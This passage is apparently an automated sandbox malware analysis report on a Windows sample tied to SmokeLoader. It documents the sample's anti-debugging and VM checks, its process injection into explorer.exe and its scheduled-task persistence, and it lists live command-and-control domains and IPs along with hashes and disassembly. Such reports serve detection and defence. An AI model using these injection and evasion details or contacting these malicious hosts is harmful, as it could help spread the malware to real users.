              Source: explorer.exe, 00000003.00000000.541592445.00000000009C8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
              Source: explorer.exe, 00000003.00000000.551747489.0000000008394000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
              Source: explorer.exe, 00000003.00000000.554336000.000000000CDC8000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: _VMware_SATA_CD00#5&
              Source: explorer.exe, 00000003.00000000.551747489.000000000830B000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000000

              Anti Debugging

              Source: C:\Users\user\Desktop\01885599.exe | System information queried: CodeIntegrityInformation
              Source: C:\Users\user\AppData\Roaming\vbjjhwi | System information queried: CodeIntegrityInformation
              Source: C:\Users\user\Desktop\01885599.exe | Code function: 0_2_0040533B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess (0_2_0040533B)
              Source: C:\Users\user\Desktop\01885599.exe | Code function: 0_2_0040D6B0 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer (0_2_0040D6B0)
              Source: C:\Users\user\Desktop\01885599.exe | Code function: 0_2_007F0042 push dword ptr fs:[00000030h] (0_2_007F0042)
              Source: C:\Users\user\AppData\Roaming\vbjjhwi | Code function: 5_2_00820042 push dword ptr fs:[00000030h] (5_2_00820042)
              Source: C:\Users\user\Desktop\01885599.exe | Process queried: DebugPort
              Source: C:\Users\user\AppData\Roaming\vbjjhwi | Process queried: DebugPort
              Source: C:\Users\user\Desktop\01885599.exe | Code function: 0_2_004084CF SetUnhandledExceptionFilter (0_2_004084CF)
              Source: C:\Users\user\Desktop\01885599.exe | Code function: 0_2_0040D9F8 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,RtlUnwind (0_2_0040D9F8)
              Source: C:\Users\user\Desktop\01885599.exe | Code function: 0_2_0040533B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess (0_2_0040533B)
              Source: C:\Users\user\Desktop\01885599.exe | Code function: 0_2_004063C4 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess (0_2_004063C4)

              HIPS / PFW / Operating System Protection Evasion

              Source: C:\Windows\explorer.exe | File created: vbjjhwi.3.dr
              Source: C:\Windows\explorer.exe | Domain query: host-file-host6.com
              Source: C:\Windows\explorer.exe | Domain query: host-host-file8.com
              Source: C:\Windows\explorer.exe | Network Connect: 194.50.153.68 80
              Source: C:\Users\user\Desktop\01885599.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
              Source: C:\Users\user\Desktop\01885599.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
              Source: C:\Users\user\AppData\Roaming\vbjjhwi | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
              Source: C:\Users\user\AppData\Roaming\vbjjhwi | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
              Source: C:\Users\user\Desktop\01885599.exe | Memory written: C:\Users\user\Desktop\01885599.exe base: 400000 value starts with: 4D5A
              Source: C:\Users\user\AppData\Roaming\vbjjhwi | Memory written: C:\Users\user\AppData\Roaming\vbjjhwi base: 400000 value starts with: 4D5A
              Source: C:\Users\user\Desktop\01885599.exe | Code function: 0_2_007F0110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess (0_2_007F0110)
              Source: C:\Users\user\Desktop\01885599.exe | Thread created: C:\Windows\explorer.exe EIP: 4C01930
              Source: C:\Users\user\AppData\Roaming\vbjjhwi | Thread created: unknown EIP: 4B01930
              Source: C:\Users\user\Desktop\01885599.exe | Process created: C:\Users\user\Desktop\01885599.exe C:\Users\user\Desktop\01885599.exe
              Source: C:\Users\user\AppData\Roaming\vbjjhwi | Process created: C:\Users\user\AppData\Roaming\vbjjhwi C:\Users\user\AppData\Roaming\vbjjhwi
              Source: explorer.exe, 00000003.00000000.541706271.0000000000E50000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: EProgram Managerzx
              Source: explorer.exe, 00000003.00000000.541706271.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.551747489.000000000834F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.548723968.0000000005C70000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
              Source: explorer.exe, 00000003.00000000.541706271.0000000000E50000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
              Source: explorer.exe, 00000003.00000000.541592445.00000000009C8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Progmanath
              Source: explorer.exe, 00000003.00000000.541706271.0000000000E50000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
              Source: C:\Users\user\Desktop\01885599.exe | Code function: GetLocaleInfoA (0_2_00410F37)
              Source: C:\Users\user\Desktop\01885599.exe | Code function: 0_2_0040963C GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter (0_2_0040963C)
              Source: C:\Users\user\Desktop\01885599.exe | Code function: 0_2_00403870 GetStringTypeExA,FindFirstVolumeMountPointW,GetPrivateProfileIntA,WaitForSingleObject,FreeConsole,GetConsoleCursorInfo,GetModuleFileNameW,EnumFontsW,GetConsoleCursorInfo,GetModuleFileNameW,EnumFontsW,GetVersionExW,GetConsoleAliasesLengthA,SleepEx,CreateFileMappingW,CreateMutexA,GetCommState,FreeConsole,MapGenericMask,DebugBreak,AttachConsole,MapGenericMask,DebugBreak,FreeConsole,AttachConsole,FreeConsole,InterlockedExchangeAdd,WaitForMultipleObjectsEx,GetCharWidthW,GetCharABCWidthsFloatW,GetCharWidthW,GetCharABCWidthsFloatW,GetLastError,GetLastError,ReplaceFileA,WritePrivateProfileStringW,lstrcmpiW,CreateEventW,ReplaceFileA,WritePrivateProfileStringW,lstrcmpiW,CreateEventW,MulDiv,CreateActCtxA,GetFileAttributesExW,GetLogicalDriveStringsA,MulDiv,CreateActCtxA,GetFileAttributesExW,GetLogicalDriveStringsA,GetLongPathNameA,WritePrivateProfileStructW,IsBadReadPtr,CancelWaitableTimer,GetFileType,GetModuleHandleA (0_2_00403870)

              Stealing of Sensitive Information

              Source: Yara match | File source: 1.2.01885599.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 5.2.vbjjhwi.8215a0.1.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 6.2.vbjjhwi.400000.0.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 0.2.01885599.exe.7f15a0.1.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 00000001.00000002.571005339.00000000005A1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000006.00000002.633668542.00000000004A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000001.00000002.570947519.0000000000420000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000006.00000002.633696994.00000000005B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY

              Remote Access Functionality

              Source: Yara match | File source: 1.2.01885599.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 5.2.vbjjhwi.8215a0.1.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 6.2.vbjjhwi.400000.0.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 0.2.01885599.exe.7f15a0.1.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 00000001.00000002.571005339.00000000005A1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000006.00000002.633668542.00000000004A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000001.00000002.570947519.0000000000420000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000006.00000002.633696994.00000000005B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY

              Mitre Att&ck Matrix

              Techniques are listed per tactic column; the number in parentheses is the count the report attaches to that technique, techniques without a number had no matching signature.

              Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
              Execution: Command and Scripting Interpreter (2); Native API (1); Exploitation for Client Execution (1); At (Windows); Cron; Launchd; Scheduled Task; Command and Scripting Interpreter; PowerShell
              Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux)
              Privilege Escalation: Process Injection (512); DLL Side-Loading (1); Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux)
              Defense Evasion: Masquerading (11); Virtualization/Sandbox Evasion (12); Process Injection (512); Deobfuscate/Decode Files or Information (1); Hidden Files and Directories (1); Obfuscated Files or Information (3); Software Packing (12); DLL Side-Loading (1); File Deletion (1)
              Credential Access: Input Capture (1); LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
              Discovery: System Time Discovery (1); Security Software Discovery (421); Virtualization/Sandbox Evasion (12); Process Discovery (2); Application Window Discovery (1); Remote System Discovery (1); File and Directory Discovery (1); System Information Discovery (14); System Network Connections Discovery
              Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Shared Webroot; Software Deployment Tools
              Collection: Input Capture (1); Archive Collected Data (1); Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
              Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
              Command and Control: Encrypted Channel (1); Non-Application Layer Protocol (2); Application Layer Protocol (112); Protocol Impersonation; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
              Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols; Rogue Cellular Base Station
              Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
              Impact: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact; Generate Fraudulent Advertising Revenue; Data Destruction
              Behavior Graph

              Behavior Graph ID: 876999 | Sample: 01885599.exe | Start date: 28/05/2023 | Architecture: WINDOWS | Score: 100

              Start (node 2)
              Signatures: Multi AV Scanner detection for domain / URL; Found malware configuration; Malicious sample detected (through community Yara rule); 6 other signatures
              Started: 01885599.exe (node 7); vbjjhwi (node 10)

              01885599.exe (node 7)
              Signatures: Detected unpacking (changes PE section rights); Contains functionality to inject code into remote processes; Injects a PE file into a foreign processes
              Started: 01885599.exe (node 12)

              vbjjhwi (node 10)
              Signatures: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file
              Started: vbjjhwi (node 15)

              01885599.exe (node 12)
              Signatures: Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)); Maps a DLL or memory area into another process; Checks if the current machine is a virtual machine (disk enumeration)
              Injected: explorer.exe (node 17)

              vbjjhwi (node 15)
              Signatures: Creates a thread in another existing process (thread injection)

              explorer.exe (node 17, injected; 2 created registry values, 3 created files)
              DNS/IP: host-file-host6.com 194.50.153.68, ports 49684 -> 80, GAZ-IS-ASRU, United Kingdom; host-host-file8.com
              Dropped: C:\Users\user\AppData\Roaming\vbjjhwi (PE32); C:\Users\user\...\vbjjhwi:Zone.Identifier (ASCII)
              Signatures: System process connects to network (likely due to code injection or exploit); Benign windows process drops PE files; Deletes itself after installation; Hides that the sample has been downloaded from the Internet (zone.identifier)

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial sample
              Source | Detection | Scanner | Label
              01885599.exe | 37% | Virustotal |
              01885599.exe | 100% | Joe Sandbox ML |

              Dropped files
              Source | Detection | Scanner | Label
              C:\Users\user\AppData\Roaming\vbjjhwi | 100% | Joe Sandbox ML |
              C:\Users\user\AppData\Roaming\vbjjhwi | 41% | ReversingLabs |
              C:\Users\user\AppData\Roaming\vbjjhwi | 37% | Virustotal |

              No Antivirus matches

              Domains
              Source | Detection | Scanner | Label
              host-file-host6.com | 22% | Virustotal |
              host-host-file8.com | 19% | Virustotal |

              URLs
              Source | Detection | Scanner | Label
              http://components.groove.net/Groove/Components/Root.osd?Package=net.groove.Groove.Tools.System.Groov | 0% | URL Reputation | safe
              http://host-file-host6.com/ | 0% | URL Reputation | safe
              http://host-host-file8.com/ | 100% | URL Reputation | malware
              http://components.groove.net/Groove/Components/SystemComponents/SystemComponents.osd?Package=net.gro | 0% | URL Reputation | safe
              Domains and IPs

              Contacted Domains
              Name | IP | Active | Malicious | Antivirus Detection | Reputation
              host-file-host6.com | 194.50.153.68 | true | true | | unknown
              host-host-file8.com | unknown | unknown | true | | unknown

              Contacted URLs
              Name | Malicious | Antivirus Detection | Reputation
              http://host-file-host6.com/ | true | URL Reputation: safe | unknown
              http://host-host-file8.com/ | true | URL Reputation: malware | unknown

              URLs from Memory and Binary Strings
              Name | Source | Malicious | Antivirus Detection | Reputation
              http://components.groove.net/Groove/Components/Root.osd?Package=net.groove.Groove.Tools.System.Groov | explorer.exe, 00000003.00000000.570166430.00007FF883839000.00000002.00000001.01000000.00000007.sdmp | false | URL Reputation: safe | unknown
              http://components.groove.net/Groove/Components/SystemComponents/SystemComponents.osd?Package=net.gro | explorer.exe, 00000003.00000000.570166430.00007FF883839000.00000002.00000001.01000000.00000007.sdmp | false | URL Reputation: safe | unknown

              Contacted IPs
              IP | Domain | Country | ASN | ASN Name | Malicious
              194.50.153.68 | host-file-host6.com | United Kingdom | 198526 | GAZ-IS-ASRU | true
              General Information

              Joe Sandbox Version: 37.1.0 Beryl
              Analysis ID: 876999
              Start date and time: 2023-05-28 10:42:06 +02:00
              Joe Sandbox Product: CloudBasic
              Overall analysis duration: 0h 7m 33s
              Hypervisor based Inspection enabled: false
              Report type: full
              Cookbook file name: default.jbs
              Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
              Number of new started processes analysed: 6
              Number of new started drivers analysed: 0
              Number of existing processes analysed: 0
              Number of existing drivers analysed: 0
              Number of injected processes analysed: 1
              Technologies:
              • HCA enabled
              • EGA enabled
              • HDC enabled
              • AMSI enabled
              Analysis Mode: default
              Analysis stop reason: Timeout
              Sample file name: 01885599.exe
              Detection: MAL
              Classification: mal100.troj.evad.winEXE@6/3@4/1
              EGA Information: Failed
              HDC Information:
              • Successful, ratio: 89% (good quality ratio 81.4%)
              • Quality average: 69.7%
              • Quality standard deviation: 32.3%
              HCA Information:
              • Successful, ratio: 100%
              • Number of executed functions: 21
              • Number of non-executed functions: 21
              Cookbook Comments:
              • Found application associated with file extension: .exe
              • Exclude process from analysis (whitelisted): audiodg.exe, WMIADAP.exe
              • Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
              • Report size getting too big, too many NtEnumerateKey calls found.
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              Time | Type | Description
              10:43:38 | API Interceptor | 495x Sleep call for process: explorer.exe modified
              10:43:39 | Task Scheduler | Run new task: Firefox Default Browser Agent 584CBA64FC927E3D path: C:\Users\user\AppData\Roaming\vbjjhwi
              Match: 194.50.153.68 (IP)
              Associated Sample Name / URL | Detection | Threat Name | Context
              HRBKz0kJwh.exe | malicious | SmokeLoader | host-file-host6.com/
              QP83uZrraW.exe | malicious | SmokeLoader | host-file-host6.com/
              PachIuLXAD.exe | malicious | SmokeLoader | host-file-host6.com/
              04121999.exe | malicious | SmokeLoader | host-file-host6.com/
              09956499.exe | malicious | SmokeLoader | host-file-host6.com/
              01294199.exe | malicious | SmokeLoader | host-file-host6.com/
              04093899.exe | malicious | SmokeLoader | host-file-host6.com/
              lB5VaRZHue.exe | malicious | SmokeLoader | host-file-host6.com/

              Match: host-file-host6.com (domain)
              Associated Sample Name / URL | Detection | Threat Name | Context
              HRBKz0kJwh.exe | malicious | SmokeLoader | 194.50.153.68
              QP83uZrraW.exe | malicious | SmokeLoader | 194.50.153.68
              PachIuLXAD.exe | malicious | SmokeLoader | 194.50.153.68
              04121999.exe | malicious | SmokeLoader | 194.50.153.68
              09956499.exe | malicious | SmokeLoader | 194.50.153.68
              01294199.exe | malicious | SmokeLoader | 194.50.153.68
              04093899.exe | malicious | SmokeLoader | 194.50.153.68
              lB5VaRZHue.exe | malicious | SmokeLoader | 194.50.153.68
              qnxkc5slHC.exe | malicious | SmokeLoader | 193.233.134.80
              toolspub1.exe | malicious | SmokeLoader | 193.233.134.80
              cjDX3dEa6r.exe | malicious | SmokeLoader | 193.233.134.80
              orwpdQFD5v.exe | malicious | SmokeLoader | 193.233.134.80
              yuegj44pTc.exe | malicious | SmokeLoader | 193.233.134.80
              file.exe | malicious | SmokeLoader | 193.233.134.80
              file.exe | malicious | SmokeLoader | 193.233.134.80
              FZNvRre16c.exe | malicious | SmokeLoader | 193.233.134.80
              wWS49l4c5n.exe | malicious | SmokeLoader | 193.233.134.80
              file.exe | malicious | SmokeLoader | 193.233.134.80
              http://host-file-host6.com | malicious | Unknown | 193.233.134.80
              RGp82p18Id.exe | malicious | SmokeLoader | 193.233.134.80

              Match: GAZ-IS-ASRU (ASN)
              Associated Sample Name / URL | Detection | Threat Name | Context
              HRBKz0kJwh.exe | malicious | SmokeLoader | 194.50.153.68
              QP83uZrraW.exe | malicious | SmokeLoader | 194.50.153.68
              PachIuLXAD.exe | malicious | SmokeLoader | 194.50.153.68
              04121999.exe | malicious | SmokeLoader | 194.50.153.68
              09956499.exe | malicious | SmokeLoader | 194.50.153.68
              01294199.exe | malicious | SmokeLoader | 194.50.153.68
              04093899.exe | malicious | SmokeLoader | 194.50.153.68
              lB5VaRZHue.exe | malicious | SmokeLoader | 194.50.153.68
              http://cc1.applicationshy.co.in/34546de4235m342356 | malicious | Unknown | 194.50.153.66
              https://61mgzw34.page.link/tobR | malicious | Unknown | 194.50.153.66
              qT4VNvfY3r.exe | malicious | LummaC Stealer, SmokeLoader | 194.50.153.77
              02321699.exe | malicious | Amadey, Djvu, Fabookie, SmokeLoader | 194.50.153.77
              05500299.exe | malicious | Amadey, Babuk, Djvu, Fabookie, SmokeLoader | 194.50.153.77
              s7MlmSnxZT.exe | malicious | Amadey, Babuk, Djvu, Fabookie, SmokeLoader | 194.50.153.77
              https://1drv.ms/b/s!AkI7leCIvhOyaYVOF475u5myxPU | malicious | Unknown | 194.50.153.66
              https://1drv.ms/b/s!Ag-bPMQV0UTbcQo0XST3R05gyJI | malicious | Unknown | 194.50.153.66
              09445899.exe | malicious | SmokeLoader | 194.50.153.77
              file.exe | malicious | Amadey, Babuk, Clipboard Hijacker, Djvu, Fabookie, SmokeLoader, Vidar | 194.50.153.77
              file.exe | malicious | Amadey, Djvu, Fabookie, SmokeLoader | 194.50.153.77
              https://1drv.ms/b/s!As8RelC5Hm_pcw3ZOs-yIc1XOb4 | malicious | Unknown | 194.50.153.66
              No context
              No context
              Created / dropped Files

              Process: C:\Windows\explorer.exe
              File Type: JSON data
              Category: dropped
              Size (bytes): 985
              Entropy (8bit): 5.225141189452099
              Encrypted: false
              SSDEEP: 24:YqHZ6T06MhmimH6CUXyhm/mYbNdB6hmUmYz0JahmDmYbxdB6hm1mY7KTdB6hmuXA:YqHZ6T06McLHDUXyceYbNdUcZYz0Jack
              MD5: 094FB5672ED4D4990DF33BE15CE2CB40
              SHA1: 2BF77D89C6637F478893D63DFC809808C835A839
              SHA-256: 19FEE75854625F0D51FE350049FE33EB16CB40E728C9BAADB232CA3E449DECA3
              SHA-512: A542CF7E0BE301B8BB2E369B0750D0C93941E02D044BFA840A28FBBEDD3F3EAF2D4E0F01ED0B3F836C916D0F0B79EEDD084DBE941A6424947C4EFE87AF38B304
              Malicious: false
              Reputation: moderate, very likely benign file
              Preview: {"RecentItems":[{"AppID":"Microsoft.MicrosoftEdge_8wekyb3d8bbwe!MicrosoftEdge","PenUsageSec":15,"LastSwitchedLowPart":3031678576,"LastSwitchedHighPart":30840569,"PrePopulated":false},{"AppID":"Microsoft.Office.OneNote_8wekyb3d8bbwe!microsoft.onenoteim","PenUsageSec":15,"LastSwitchedLowPart":4008173792,"LastSwitchedHighPart":30747923,"PrePopulated":true},{"AppID":"Microsoft.WindowsMaps_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":3998173792,"LastSwitchedHighPart":30747923,"PrePopulated":true},{"AppID":"Microsoft.MSPaint_8wekyb3d8bbwe!Microsoft.MSPaint","PenUsageSec":15,"LastSwitchedLowPart":3988173792,"LastSwitchedHighPart":30747923,"PrePopulated":true},{"AppID":"Microsoft.Windows.Photos_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":3968173792,"LastSwitchedHighPart":30747923,"PrePopulated":true},{"AppID":"Microsoft.Getstarted_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":3958173792,"LastSwitchedHighPart":30747923,"PrePopulated":true}]}

              Process: C:\Windows\explorer.exe
              File Type: PE32 executable (GUI) Intel 80386, for MS Windows
              Category: dropped
              Size (bytes): 290304
              Entropy (8bit): 6.587235509794249
              Encrypted: false
              SSDEEP: 3072:X6JOiohJ19MbvuzdRE45nLtn5gFTti91:yOiY9T10FTti
              MD5: A29C587C678826F4A44CF6A2A78599F1
              SHA1: 92EA36730FA1F19300A27EBBB4D1359E7B8A16DE
              SHA-256: B3FBCFD775B7C9BFC5B58F5DF13EB8FBEB4844D98756F8FCA41B63F060AE5132
              SHA-512: 72CB4A67885C7E2167F98365F209FB0F757FB978ACBB55099D5A8B768DDE4158071DF3BD6D6CD808255A45FFE24040D86715A673EAEB386B1412918B2C65DDED
              Malicious: true
              Antivirus:
              • Antivirus: Joe Sandbox ML, Detection: 100%
              • Antivirus: ReversingLabs, Detection: 41%
              • Antivirus: Virustotal, Detection: 37%
              Reputation: low
              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......&...b...b...b...|.......|.......|...H...EX..k...b.....|...c...|...c...|...c...Richb...................PE..L.... Ib....................."&.....YN............@...........................(.....E...........................................d.....'.......................(..... ...............................P1..@............................................text............................... ..`.data...DX$.........................@....rsrc.........'.....................@..@.reloc..83....(..4...:..............@..B........................................................................................................................................................................................................................................................................................................................................................................

              Process: C:\Windows\explorer.exe
              File Type: ASCII text, with CRLF line terminators
              Category: modified
              Size (bytes): 26
              Entropy (8bit): 3.95006375643621
              Encrypted: false
              SSDEEP: 3:ggPYV:rPYV
              MD5: 187F488E27DB4AF347237FE461A079AD
              SHA1: 6693BA299EC1881249D59262276A0D2CB21F8E64
              SHA-256: 255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
              SHA-512: 89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
              Malicious: true
              Reputation: high, very likely benign file
              Preview: [ZoneTransfer]....ZoneId=0
              File type:PE32 executable (GUI) Intel 80386, for MS Windows
              Entropy (8bit):6.587235509794249
              TrID:
              • Win32 Executable (generic) a (10002005/4) 99.96%
              • Generic Win/DOS Executable (2004/3) 0.02%
              • DOS Executable Generic (2002/1) 0.02%
              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
              File name:01885599.exe
              File size:290304
              MD5:a29c587c678826f4a44cf6a2a78599f1
              SHA1:92ea36730fa1f19300a27ebbb4d1359e7b8a16de
              SHA256:b3fbcfd775b7c9bfc5b58f5df13eb8fbeb4844d98756f8fca41b63f060ae5132
              SHA512:72cb4a67885c7e2167f98365f209fb0f757fb978acbb55099d5a8b768dde4158071df3bd6d6cd808255a45ffe24040d86715a673eaeb386b1412918b2c65dded
              SSDEEP:3072:X6JOiohJ19MbvuzdRE45nLtn5gFTti91:yOiY9T10FTti
              TLSH:F154185382A13C55EA668B768E1FC6F8761EB6718F5D3769321CBA1F08B00B2D173B11
              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......&...b...b...b...|.......|.......|...H...EX..k...b.......|...c...|...c...|...c...Richb...................PE..L.... Ib...........
              Icon Hash:554541494945691d
              Entrypoint:0x404e59
              Entrypoint Section:.text
              Digitally signed:false
              Imagebase:0x400000
              Subsystem:windows gui
              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
              DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
              Time Stamp:0x62492001 [Sun Apr 3 04:18:09 2022 UTC]
              TLS Callbacks:
              CLR (.Net) Version:
              OS Version Major:5
              OS Version Minor:0
              File Version Major:5
              File Version Minor:0
              Subsystem Version Major:5
              Subsystem Version Minor:0
              Import Hash:2d9ed3462f8a74bfd1231e2e9de56b43
              Instruction
              call 00007F66CCCE3613h
              jmp 00007F66CCCDECADh
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              mov ecx, dword ptr [esp+04h]
              test ecx, 00000003h
              je 00007F66CCCDEE56h
              mov al, byte ptr [ecx]
              add ecx, 01h
              test al, al
              je 00007F66CCCDEE80h
              test ecx, 00000003h
              jne 00007F66CCCDEE21h
              add eax, 00000000h
              lea esp, dword ptr [esp+00000000h]
              lea esp, dword ptr [esp+00000000h]
              mov eax, dword ptr [ecx]
              mov edx, 7EFEFEFFh
              add edx, eax
              xor eax, FFFFFFFFh
              xor eax, edx
              add ecx, 04h
              test eax, 81010100h
              je 00007F66CCCDEE1Ah
              mov eax, dword ptr [ecx-04h]
              test al, al
              je 00007F66CCCDEE64h
              test ah, ah
              je 00007F66CCCDEE56h
              test eax, 00FF0000h
              je 00007F66CCCDEE45h
              test eax, FF000000h
              je 00007F66CCCDEE34h
              jmp 00007F66CCCDEDFFh
              lea eax, dword ptr [ecx-01h]
              mov ecx, dword ptr [esp+04h]
              sub eax, ecx
              ret
              lea eax, dword ptr [ecx-02h]
              mov ecx, dword ptr [esp+04h]
              sub eax, ecx
              ret
              lea eax, dword ptr [ecx-03h]
              mov ecx, dword ptr [esp+04h]
              sub eax, ecx
              ret
              lea eax, dword ptr [ecx-04h]
              mov ecx, dword ptr [esp+04h]
              sub eax, ecx
              ret
              mov edi, edi
              push ebp
              mov ebp, esp
              sub esp, 20h
              mov eax, dword ptr [ebp+08h]
              push esi
              push edi
              push 00000008h
              pop ecx
              mov esi, 004012D8h
              lea edi, dword ptr [ebp-20h]
              rep movsd
              mov dword ptr [ebp-08h], eax
              mov eax, dword ptr [ebp+0Ch]
              pop edi
              mov dword ptr [ebp-04h], eax
              pop esi
              Programming Language:
              • [ASM] VS2008 build 21022
              • [ C ] VS2008 build 21022
              • [C++] VS2008 build 21022
              • [IMP] VS2005 build 50727
              • [RES] VS2008 build 21022
              • [LNK] VS2008 build 21022
               Name                                  Virtual Address  Virtual Size  Is in Section
               IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
               IMAGE_DIRECTORY_ENTRY_IMPORT          0x287f8          0x64          .text
               IMAGE_DIRECTORY_ENTRY_RESOURCE        0x270000         0x19398       .rsrc
               IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
               IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
